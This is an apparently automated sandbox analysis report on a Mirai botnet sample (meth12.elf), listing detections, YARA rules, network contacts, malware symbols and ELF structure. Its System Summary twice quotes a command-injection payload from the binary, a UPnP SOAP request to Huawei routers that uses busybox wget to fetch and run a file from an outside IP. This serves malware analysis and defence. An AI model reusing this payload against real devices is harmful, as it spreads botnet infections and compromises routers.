Edit tour

Linux Analysis Report
meth12.elf

Overview

General Information

Sample name:	meth12.elf
Analysis ID:	1590756
MD5:	8a75b245b02efd9ab6e3f0d81d88d2f0
SHA1:	272e023192d3c774d97a777f2b15fe4f2132a5e8
SHA256:	4f781f571c8eb7847f42cc19d387194f97f5ad2d3701b19aad480c422e290cad
Tags:	elfuser-abuse_ch
Infos:

Detection

Mirai

Score:	92
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Mirai

Contains symbols with names commonly found in malware

Sample and/or dropped files contains symbols with suspicious names

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Yara signature match

Classification

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590756
Start date and time:	2025-01-14 15:53:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	meth12.elf
Detection:	MAL
Classification:	mal92.troj.linELF@0/0@0/0
Cookbook Comments:	Analysis time extended to 480s due to sleep detection in submitted sample

Runtime Messages

Command:	/tmp/meth12.elf
PID:	6238
Exit Code:	255
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:	/lib/ld-uClibc.so.0: No such file or directory

Process Tree

system is lnxubuntu20

meth12.elf (PID: 6238, Parent: 6159, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/meth12.elf

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
meth12.elf	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
meth12.elf	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
meth12.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
meth12.elf	Linux_Trojan_Mirai_0bce98a2	unknown	unknown	0x980c:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
meth12.elf	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0x97b0:$x2: /dev/misc/watchdog 0x97a0:$x3: /dev/watchdog 0x9818:$s5: HWCLVGAJ

Memory Dumps

Source	Rule	Description	Author	Strings
6238.1.00007f2a40028000.00007f2a40029000.rw-.sdmp	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
6238.1.00007f2a40028000.00007f2a40029000.rw-.sdmp	Linux_Trojan_Mirai_0bce98a2	unknown	unknown	0x80c:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
6238.1.00007f2a40017000.00007f2a40021000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6238.1.00007f2a40017000.00007f2a40021000.r-x.sdmp	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
6238.1.00007f2a40017000.00007f2a40021000.r-x.sdmp	Linux_Trojan_Mirai_0bce98a2	unknown	unknown	0x980c:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
6238.1.00007f2a40017000.00007f2a40021000.r-x.sdmp	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0x97b0:$x2: /dev/misc/watchdog 0x97a0:$x3: /dev/watchdog 0x9818:$s5: HWCLVGAJ
Process Memory Space: meth12.elf PID: 6238	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
Click to see the 2 entries

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: meth12.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: meth12.elf	ReversingLabs: Detection: 55%
Source: meth12.elf	Virustotal: Detection: 46%			Perma Link

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43

Source: meth12.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: meth12.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: meth12.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
Source: meth12.elf, type: SAMPLE	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6238.1.00007f2a40028000.00007f2a40029000.rw-.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
Source: 6238.1.00007f2a40017000.00007f2a40021000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
Source: 6238.1.00007f2a40017000.00007f2a40021000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth

Contains symbols with names commonly found in malware

Source: ELF static info symbol of initial sample	Name: attack.c
Source: ELF static info symbol of initial sample	Name: attack_get_opt_int
Source: ELF static info symbol of initial sample	Name: attack_get_opt_ip
Source: ELF static info symbol of initial sample	Name: attack_gre.c
Source: ELF static info symbol of initial sample	Name: attack_gre_eth
Source: ELF static info symbol of initial sample	Name: attack_gre_ip
Source: ELF static info symbol of initial sample	Name: attack_init
Source: ELF static info symbol of initial sample	Name: attack_kill_all
Source: ELF static info symbol of initial sample	Name: attack_ongoing
Source: ELF static info symbol of initial sample	Name: attack_parse

Source: meth12.elf	ELF static info symbol of initial sample: huawei_scanner_pid
Source: meth12.elf	ELF static info symbol of initial sample: huawei_scanner_rawpkt
Source: meth12.elf	ELF static info symbol of initial sample: scanner.c
Source: meth12.elf	ELF static info symbol of initial sample: scanner_init
Source: meth12.elf	ELF static info symbol of initial sample: scanner_pid
Source: meth12.elf	ELF static info symbol of initial sample: scanner_rawpkt

Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 193.233.193.12 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 193.233.193.12 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1

Source: meth12.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
Source: meth12.elf, type: SAMPLE	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6238.1.00007f2a40028000.00007f2a40029000.rw-.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
Source: 6238.1.00007f2a40017000.00007f2a40021000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
Source: 6238.1.00007f2a40017000.00007f2a40021000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b

Source: classification engine

Classification label: mal92.troj.linELF@0/0@0/0

Source: /tmp/meth12.elf (PID: 6238)

Queries kernel information via 'uname':

Jump to behavior

Source: meth12.elf, 6238.1.000055b2f4e9b000.000055b2f4fc9000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm
Source: meth12.elf, 6238.1.00007ffd2cd9f000.00007ffd2cdc0000.rw-.sdmp	Binary or memory string: qemu: %s: %s
Source: meth12.elf, 6238.1.00007ffd2cd9f000.00007ffd2cdc0000.rw-.sdmp	Binary or memory string: leqemu: %s: %s
Source: meth12.elf, 6238.1.000055b2f4e9b000.000055b2f4fc9000.rw-.sdmp	Binary or memory string: Urg.qemu.gdb.arm.sys.regs">
Source: meth12.elf, 6238.1.000055b2f4e9b000.000055b2f4fc9000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: meth12.elf, 6238.1.00007ffd2cd9f000.00007ffd2cdc0000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: meth12.elf, 6238.1.00007ffd2cd9f000.00007ffd2cdc0000.rw-.sdmp	Binary or memory string: /x86_64/usr/bin/qemu-arm/tmp/meth12.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/meth12.elf
Source: meth12.elf, 6238.1.000055b2f4e9b000.000055b2f4fc9000.rw-.sdmp	Binary or memory string: rg.qemu.gdb.arm.sys.regs">

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: meth12.elf, type: SAMPLE
Source: Yara match	File source: 6238.1.00007f2a40028000.00007f2a40029000.rw-.sdmp, type: MEMORY
Source: Yara match	File source: 6238.1.00007f2a40017000.00007f2a40021000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: meth12.elf PID: 6238, type: MEMORYSTR

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: meth12.elf, type: SAMPLE
Source: Yara match	File source: 6238.1.00007f2a40028000.00007f2a40029000.rw-.sdmp, type: MEMORY
Source: Yara match	File source: 6238.1.00007f2a40017000.00007f2a40021000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: meth12.elf PID: 6238, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
meth12.elf	55%	ReversingLabs	Linux.Trojan.Mirai
meth12.elf	46%	Virustotal		Browse
meth12.elf	100%	Avira	EXP/ELF.Gafgyt.X

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/soap/encoding/	meth12.elf	false		high
http://schemas.xmlsoap.org/soap/envelope/	meth12.elf	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
91.189.91.43	rebirth.ppc.elf	Get hash	malicious	Gafgyt	Browse
	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse
	p-p.c-.Sakura.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	rebirth.arm5.elf	Get hash	malicious	Gafgyt	Browse
	Aqua.i686.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	sshd.elf	Get hash	malicious	Unknown	Browse
91.189.91.42	rebirth.ppc.elf	Get hash	malicious	Gafgyt	Browse
	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse
	p-p.c-.Sakura.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	rebirth.arm5.elf	Get hash	malicious	Gafgyt	Browse
	Aqua.i686.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	sshd.elf	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	185.125.190.26
	x86.elf	Get hash	malicious	Mirai, Moobot	Browse	185.125.190.26
	rebirth.ppc.elf	Get hash	malicious	Gafgyt	Browse	91.189.91.42
	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	91.189.91.42
	p-p.c-.Sakura.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.189.91.42
	rebirth.mips.elf	Get hash	malicious	Gafgyt	Browse	185.125.190.26
	rebirth.arm5.elf	Get hash	malicious	Gafgyt	Browse	91.189.91.42
	rebirth.x86.elf	Get hash	malicious	Gafgyt	Browse	185.125.190.26
	Aqua.i686.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
CANONICAL-ASGB	m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	185.125.190.26
	x86.elf	Get hash	malicious	Mirai, Moobot	Browse	185.125.190.26
	rebirth.ppc.elf	Get hash	malicious	Gafgyt	Browse	91.189.91.42
	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	91.189.91.42
	p-p.c-.Sakura.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.189.91.42
	rebirth.mips.elf	Get hash	malicious	Gafgyt	Browse	185.125.190.26
	rebirth.arm5.elf	Get hash	malicious	Gafgyt	Browse	91.189.91.42
	rebirth.x86.elf	Get hash	malicious	Gafgyt	Browse	185.125.190.26
	Aqua.i686.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
INIT7CH	rebirth.ppc.elf	Get hash	malicious	Gafgyt	Browse	109.202.202.202
	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	109.202.202.202
	p-p.c-.Sakura.elf	Get hash	malicious	Gafgyt, Mirai	Browse	109.202.202.202
	rebirth.arm5.elf	Get hash	malicious	Gafgyt	Browse	109.202.202.202
	Aqua.i686.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	sshd.elf	Get hash	malicious	Unknown	Browse	109.202.202.202

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, with debug_info, not stripped
Entropy (8bit):	5.9940950766110666
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	meth12.elf
File size:	49'682 bytes
MD5:	8a75b245b02efd9ab6e3f0d81d88d2f0
SHA1:	272e023192d3c774d97a777f2b15fe4f2132a5e8
SHA256:	4f781f571c8eb7847f42cc19d387194f97f5ad2d3701b19aad480c422e290cad
SHA512:	7037a196da02bd63dedddb8049d9bbbffb11b4ba644fc0d0fd3f4be3a2e9605e8faa3cf2a6f67ed193ca78618e4edcb5c25091bd94aeba8c42f11d24dcd38287
SSDEEP:	768:zVhM588UDLnDdeSxM3cXxF1L9Sgv9FlqBG4XTJW/RBWHXVDAQMKyPTnsckLzcI3a:jM5ILtxMgLJVmdTJMWi9TsckLz9K
TLSH:	EB2319857CC28E1AC5D412BABB7F02E9331163A8D2CF7313D4149B587E8A52E4F67B85
File Content Preview:	.ELF..............(.........4...........4. ...(.........4...4...4.......................................................................................................\...........................................Q.td............................/lib/ld-uCl

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	ARM
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8df8
Flags:	0x4000002
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	6
Section Header Offset:	41496
Section Header Size:	40
Number of Section Headers:	29
Header String Table Index:	26

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Link	Info	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0	0	0
.interp	PROGBITS	0x80f4	0xf4	0x14	0x0	0x2	A	0	0	1
.hash	HASH	0x8108	0x108	0x224	0x4	0x2	A	3	0	4
.dynsym	DYNSYM	0x832c	0x32c	0x440	0x10	0x2	A	4	1	4
.dynstr	STRTAB	0x876c	0x76c	0x1fd	0x0	0x2	A	0	0	1
.rel.plt	REL	0x896c	0x96c	0x1a0	0x8	0x2	A	3	7	4
.init	PROGBITS	0x8b0c	0xb0c	0x10	0x0	0x6	AX	0	0	4
.plt	PROGBITS	0x8b1c	0xb1c	0x284	0x4	0x6	AX	0	0	4
.text	PROGBITS	0x8da0	0xda0	0x86b4	0x0	0x6	AX	0	0	4
.fini	PROGBITS	0x11454	0x9454	0x10	0x0	0x6	AX	0	0	4
.rodata	PROGBITS	0x11464	0x9464	0x5a4	0x0	0x2	A	0	0	4
.eh_frame	PROGBITS	0x19a08	0x9a08	0x4	0x0	0x3	WA	0	0	4
.init_array	INIT_ARRAY	0x19a0c	0x9a0c	0x4	0x0	0x3	WA	0	0	4
.fini_array	FINI_ARRAY	0x19a10	0x9a10	0x4	0x0	0x3	WA	0	0	4
.jcr	PROGBITS	0x19a14	0x9a14	0x4	0x0	0x3	WA	0	0	4
.dynamic	DYNAMIC	0x19a18	0x9a18	0xb8	0x8	0x3	WA	4	0	4
.got	PROGBITS	0x19ad0	0x9ad0	0xdc	0x4	0x3	WA	0	0	4
.data	PROGBITS	0x19bac	0x9bac	0x60	0x0	0x3	WA	0	0	4
.bss	NOBITS	0x19c0c	0x9c0c	0x158	0x0	0x3	WA	0	0	4
.comment	PROGBITS	0x0	0x9c0c	0x190	0x0	0x0		0	0	1
.debug_aranges	PROGBITS	0x0	0x9da0	0x40	0x0	0x0		0	0	8
.debug_info	PROGBITS	0x0	0x9de0	0x192	0x0	0x0		0	0	1
.debug_abbrev	PROGBITS	0x0	0x9f72	0x28	0x0	0x0		0	0	1
.debug_line	PROGBITS	0x0	0x9f9a	0x142	0x0	0x0		0	0	1
.debug_frame	PROGBITS	0x0	0xa0dc	0x2c	0x0	0x0		0	0	4
.ARM.attributes	ARM_ATTRIBUTES	0x0	0xa108	0x16	0x0	0x0		0	0	1
.shstrtab	STRTAB	0x0	0xa11e	0xf7	0x0	0x0		0	0	1
.symtab	SYMTAB	0x0	0xa6a0	0x1390	0x10	0x0		28	171	4
.strtab	STRTAB	0x0	0xba30	0x7e2	0x0	0x0		0	0	1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Prog Interpreter	Section Mappings
PHDR	0x34	0x8034	0x8034	0xc0	0xc0	2.2394	0x5	R E	0x4
INTERP	0xf4	0x80f4	0x80f4	0x14	0x14	3.6842	0x4	R	0x1	/lib/ld-uClibc.so.0	.interp
LOAD	0x0	0x8000	0x8000	0x9a08	0x9a08	6.1225	0x5	R E	0x8000		.interp .hash .dynsym .dynstr .rel.plt .init .plt .text .fini .rodata
LOAD	0x9a08	0x19a08	0x19a08	0x204	0x35c	3.3864	0x6	RW	0x8000		.eh_frame .init_array .fini_array .jcr .dynamic .got .data .bss
DYNAMIC	0x9a18	0x19a18	0x19a18	0xb8	0xb8	2.0531	0x6	RW	0x4		.dynamic
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Dynamic Tags

Type	Meta	Value	Tag
DT_NEEDED	sharedlib	libc.so.0	0x1
DT_INIT	value	0x8b0c	0xc
DT_FINI	value	0x11454	0xd
DT_INIT_ARRAY	value	0x19a0c	0x19
DT_INIT_ARRAYSZ	bytes	4	0x1b
DT_FINI_ARRAY	value	0x19a10	0x1a
DT_FINI_ARRAYSZ	bytes	4	0x1c
DT_HASH	value	0x8108	0x4
DT_STRTAB	value	0x876c	0x5
DT_SYMTAB	value	0x832c	0x6
DT_STRSZ	bytes	509	0xa
DT_SYMENT	bytes	16	0xb
DT_DEBUG	value	0x0	0x15
DT_PLTGOT	value	0x19ad0	0x3
DT_PLTRELSZ	bytes	416	0x2
DT_PLTREL	pltrel	DT_REL	0x14
DT_JMPREL	value	0x896c	0x17
DT_NULL	value	0x0	0x0

Symbols

Name	Section Name	Value	Size	Symbol Type	Symbol Bind	Symbol Visibility	Ndx
	.dynsym	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__bss_end__	.dynsym	0x19d64	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__bss_start	.dynsym	0x19c0c	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__bss_start__	.dynsym	0x19c0c	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__data_start	.dynsym	0x19bac	0	NOTYPE	<unknown>	DEFAULT	17
__end__	.dynsym	0x19d64	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__errno_location	.dynsym	0x8d10	32	FUNC	<unknown>	DEFAULT	SHN_UNDEF
__exidx_end	.dynsym	0x11a08	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__exidx_start	.dynsym	0x11a08	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__uClibc_main	.dynsym	0x8cbc	848	FUNC	<unknown>	DEFAULT	SHN_UNDEF
_bss_end__	.dynsym	0x19d64	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_edata	.dynsym	0x19c0c	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_end	.dynsym	0x19d64	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_start	.dynsym	0x8df8	80	FUNC	<unknown>	DEFAULT	8
abort	.dynsym	0x8bfc	296	FUNC	<unknown>	DEFAULT	SHN_UNDEF
accept	.dynsym	0x8c08	116	FUNC	<unknown>	DEFAULT	SHN_UNDEF
atoi	.dynsym	0x0	32	FUNC	<unknown>	DEFAULT	SHN_UNDEF
